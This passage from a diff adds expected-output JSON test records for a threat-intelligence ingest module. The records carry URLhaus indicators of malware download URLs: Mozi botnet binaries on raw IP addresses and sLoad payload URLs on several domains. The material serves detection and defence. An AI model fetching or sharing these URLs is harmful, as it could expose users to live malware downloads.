listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "115.58.83.167", + "threatintel.indicator.first_seen": "2021-01-14T21:04:04.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "115.58.83.167", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://115.58.83.167:34141/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 34141, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961507/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 14197, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "94.178.124.83", + "threatintel.indicator.first_seen": "2021-01-14T20:52:08.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "94.178.124.83", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://94.178.124.83:44399/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 44399, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961508/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 14553, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "182.122.75.232", + "threatintel.indicator.first_seen": "2021-01-14T20:52:08.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "182.122.75.232", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://182.122.75.232:49120/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 49120, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961506/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 14911, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "115.63.202.43", + "threatintel.indicator.first_seen": "2021-01-14T20:52:07.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "115.63.202.43", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://115.63.202.43:51136/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 51136, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961504/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 15267, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "59.99.40.204", + "threatintel.indicator.first_seen": "2021-01-14T20:52:06.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "59.99.40.204", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://59.99.40.204:45773/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 45773, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961505/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 15621, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "117.247.128.213", + "threatintel.indicator.first_seen": "2021-01-14T20:52:06.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "117.247.128.213", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://117.247.128.213:56528/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 56528, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961500/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 15981, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "14.137.219.132", + "threatintel.indicator.first_seen": "2021-01-14T20:52:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "14.137.219.132", + "threatintel.indicator.url.extension": "a", + "threatintel.indicator.url.original": "http://14.137.219.132:44427/Mozi.a", + "threatintel.indicator.url.path": "/Mozi.a", + "threatintel.indicator.url.port": 44427, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961501/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 16339, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "42.224.40.14", + "threatintel.indicator.first_seen": "2021-01-14T20:52:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "42.224.40.14", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://42.224.40.14:36134/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 36134, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961502/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 16693, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "186.33.104.107", + "threatintel.indicator.first_seen": "2021-01-14T20:52:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "186.33.104.107", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://186.33.104.107:43973/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 43973, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961503/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 17051, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "85.105.16.154", + "threatintel.indicator.first_seen": "2021-01-14T20:52:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "85.105.16.154", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://85.105.16.154:41319/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 41319, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961496/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 17407, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "178.141.73.115", + "threatintel.indicator.first_seen": "2021-01-14T20:52:04.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "178.141.73.115", + "threatintel.indicator.url.extension": "a", + "threatintel.indicator.url.original": "http://178.141.73.115:51847/Mozi.a", + "threatintel.indicator.url.path": "/Mozi.a", + "threatintel.indicator.url.port": 51847, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961497/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 17765, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "186.33.104.135", + "threatintel.indicator.first_seen": "2021-01-14T20:52:04.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "186.33.104.135", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://186.33.104.135:54469/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 54469, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961498/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 18123, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "115.56.159.43", + "threatintel.indicator.first_seen": "2021-01-14T20:52:04.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "115.56.159.43", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://115.56.159.43:34547/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 34547, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961499/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 18479, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "42.230.138.170", + "threatintel.indicator.first_seen": "2021-01-14T20:52:04.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "42.230.138.170", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://42.230.138.170:33932/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 33932, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961494/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 18837, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:47.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://univirtek.com/viro/02478080035/blank.jpg", + "threatintel.indicator.url.path": "/viro/02478080035/blank.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961495/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 19207, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:47.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://univirtek.com/viro/FRRNDR77C25D325O/map.png", + "threatintel.indicator.url.path": "/viro/FRRNDR77C25D325O/map.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961492/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 19580, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "ladiesincode.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:45.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "ladiesincode.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://ladiesincode.com/ladi/CNNSRG83H04F158R/blank.jpg", + "threatintel.indicator.url.path": "/ladi/CNNSRG83H04F158R/blank.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961493/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 19961, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "letonguesc.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:45.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "letonguesc.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://letonguesc.com/leto/02328510512/logo.css", + "threatintel.indicator.url.path": "/leto/02328510512/logo.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961490/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 20332, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:44.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://cxminute.com/minu/MLILSN74B21E507L/uk.png", + "threatintel.indicator.url.path": "/minu/MLILSN74B21E507L/uk.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961491/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 20702, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:44.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://cxminute.com/minu/12875710159/blank.css", + "threatintel.indicator.url.path": "/minu/12875710159/blank.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961489/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 21070, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:41.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "gif", + "threatintel.indicator.url.original": "https://cxminute.com/minu/CPNLNZ65M20A200N/maps.gif", + "threatintel.indicator.url.path": "/minu/CPNLNZ65M20A200N/maps.gif", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961488/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 21442, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "belfetproduction.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:40.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "belfetproduction.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://belfetproduction.com/bella/DLPCMN64D02D789E/logo.png", + "threatintel.indicator.url.path": "/bella/DLPCMN64D02D789E/logo.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961487/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 21831, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "belfetproduction.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:17.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "belfetproduction.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://belfetproduction.com/bella/01844510469/1x1.jpg", + "threatintel.indicator.url.path": "/bella/01844510469/1x1.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961485/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 22214, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "ladiesincode.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:16.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "ladiesincode.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://ladiesincode.com/ladi/FRRDNI52M71E522D/logo.css", + "threatintel.indicator.url.path": "/ladi/FRRDNI52M71E522D/logo.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961486/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 22594, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "letonguesc.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:16.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "letonguesc.com", + "threatintel.indicator.url.extension": "gif", + "threatintel.indicator.url.original": "https://letonguesc.com/leto/CPPMRC65E04H980Q/it.gif", + "threatintel.indicator.url.path": "/leto/CPPMRC65E04H980Q/it.gif", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961482/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 22968, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:15.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://univirtek.com/viro/06389650018/it.css", + "threatintel.indicator.url.path": "/viro/06389650018/it.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961483/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 23335, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "belfetproduction.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:15.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + 